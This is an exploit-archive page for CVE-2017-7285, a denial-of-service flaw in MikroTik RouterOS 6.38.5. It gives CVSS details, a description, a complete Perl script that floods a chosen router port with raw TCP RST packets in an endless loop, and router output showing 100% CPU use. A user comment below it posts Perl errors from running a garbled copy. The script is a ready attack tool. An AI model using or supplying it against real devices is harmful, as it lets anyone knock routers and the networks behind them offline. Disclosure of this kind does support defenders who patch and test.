MikroTik RouterBoard V-6.38.5 Denial Of Service | CPU Consumption

Risk: Medium
Local: No
Remote: Yes
CWE: CWE-400

CVSS Base Score: 7.8/10
Impact Subscore: 6.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Complete

################ #Exploit Title: MikroTik RouterBoard V-6.38.5 Denial Of Service | CPU Consumption #CVE: CVE-2017-7285 #CWE: CWE-400 #Exploit Author: Hosein Askari (FarazPajohan) #Vendor HomePage: https://mikrotik.com/ #Version : V-6.38.5 #Exploit Tested on: LionSec OS #Date: 28-03-2017 #Category: Network Appliance #Author Mail : hosein.askari@aol.com #Description: A vulnerability in the network stack of MikroTik Version 6.38.5 released 2017-03-09 could allow an unauthenticated remote attacker to exhaust all available CPU via a flood of TCP RST packets, preventing the affected router from accepting new TCP connections. ############### Exploit: #perl exploit.pl 2000 8291(winbox port) #!/usr/local/bin/perl use Socket; $src_host = $ARGV[0]; $src_port = $ARGV[1]; $dst_host = $ARGV[2]; $dst_port = $ARGV[3]; if(!defined $src_host or !defined $src_port or !defined $dst_host or !defined $dst_port) { print "Usage: $0 <source host> <source port> <dest host> <dest port>\n"; exit; } else { main(); } sub main { my $src_host = (gethostbyname($src_host))[4]; my $dst_host = (gethostbyname($dst_host))[4]; $IPROTO_RAW = 255; socket($sock , AF_INET, SOCK_RAW, $IPROTO_RAW) or die $!; my ($packet) = makeheaders($src_host, $src_port, $dst_host, $dst_port); my ($destination) = pack('Sna4x8', AF_INET, $dst_port, $dst_host); while(1) { send($sock , $packet , 0 , $destination) or die $!; } } sub makeheaders { $IPPROTO_TCP = 6; local($src_host , $src_port , $dst_host , $dst_port) = @_; my $zero_cksum = 0; my $tcp_len = 20; my $seq = 19456; my $seq_ack = 0; my $tcp_doff = "5"; my $tcp_res = 0; my $tcp_doff_res = $tcp_doff . $tcp_res; my $tcp_urg = 0; my $tcp_ack = 0; my $tcp_psh = 0; my $tcp_rst = 1; my $tcp_syn = 0; my $tcp_fin = 0; my $null = 0; my $tcp_win = 124; my $tcp_urg_ptr = 44; my $tcp_flags = $null . $null . $tcp_urg . $tcp_ack . $tcp_psh . $tcp_rst . $tcp_syn . $tcp_fin ; my $tcp_check = 0; my $tcp_header = pack('nnNNH2B8nvn' , $src_port , $dst_port , $seq, $seq_ack , $tcp_doff_res, $tcp_flags, $tcp_win , $tcp_check, $tcp_urg_ptr); my $tcp_pseudo = pack('a4a4CCn' , $src_host, $dst_host, 0, $IPPROTO_TCP, length($tcp_header) ) . $tcp_header; $tcp_check = &checksum($tcp_pseudo); my $tcp_header = pack('nnNNH2B8nvn' , $src_port , $dst_port , $seq, $seq_ack , $tcp_doff_res, $tcp_flags, $tcp_win , $tcp_check, $tcp_urg_ptr); my $ip_ver = 4; my $ip_len = 5; my $ip_ver_len = $ip_ver . $ip_len; my $ip_tos = 00; my $ip_tot_len = $tcp_len + 20; my $ip_frag_id = 19245; my $ip_ttl = 25; my $ip_proto = $IPPROTO_TCP; my $ip_frag_flag = "010"; my $ip_frag_oset = "0000000000000"; my $ip_fl_fr = $ip_frag_flag . $ip_frag_oset; my $ip_header = pack('H2CnnB16CCna4a4', $ip_ver_len, $ip_tos, $ip_tot_len, $ip_frag_id, $ip_fl_fr , $ip_ttl , $ip_proto , $zero_cksum , $src_host , $dst_host); my $pkt = $ip_header . $tcp_header; return $pkt; } sub checksum { my ($msg) = @_; my ($len_msg,$num_short,$short,$chk); $len_msg = length($msg); $num_short = $len_msg / 2; $chk = 0; foreach $short (unpack("S$num_short", $msg)) { $chk += $short; } $chk += unpack("C", substr($msg, $len_msg - 1, 1)) if $len_msg % 2; $chk = ($chk >> 16) + ($chk & 0xffff); return(~(($chk >> 16) + $chk) & 0xffff); } #################### The sample of resource usage is shown below: [admin@MikroTik] > system resource monitor cpu-used: 100% cpu-used-per-cpu: 100% free-memory: 8480KiB

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kalook | Date: 2018-03-07 10:29 CET+1
root@kali:~# perl 41752.pl 2000 8291 Bareword found where operator expected at 41752.pl line 5, near "3D" (Missing operator before D?) Scalar found where operator expected at 41752.pl line 6, near "$src_port" (Missing semicolon on previous line?) Bareword found where operator expected at 41752.pl line 6, near "3D" (Missing operator before D?) Scalar found where operator expected at 41752.pl line 7, near "$dst_host" (Missing semicolon on previous line?) Bareword found where operator expected at 41752.pl line 7, near "3D" (Missing operator before D?) Scalar found where operator expected at 41752.pl line 8, near "$dst_port" (Missing semicolon on previous line?) Bareword found where operator expected at 41752.pl line 8, near "3D" (Missing operator before D?) Bareword found where operator expected at 41752.pl line 20, near "09main" (Missing operator before main?) syntax error at 41752.pl line 5, near "3D " Illegal octal digit '9' at 41752.pl line 13, at end of line Illegal octal digit '9' at 41752.pl line 14, at end of line Illegal octal digit '9' at 41752.pl line 15, at end of line Illegal octal digit '9' at 41752.pl line 19, at end of line Illegal octal digit '9' at 41752.pl line 20, at end of line Illegal declaration of subroutine main::main at 41752.pl line 23. ehy this error ???

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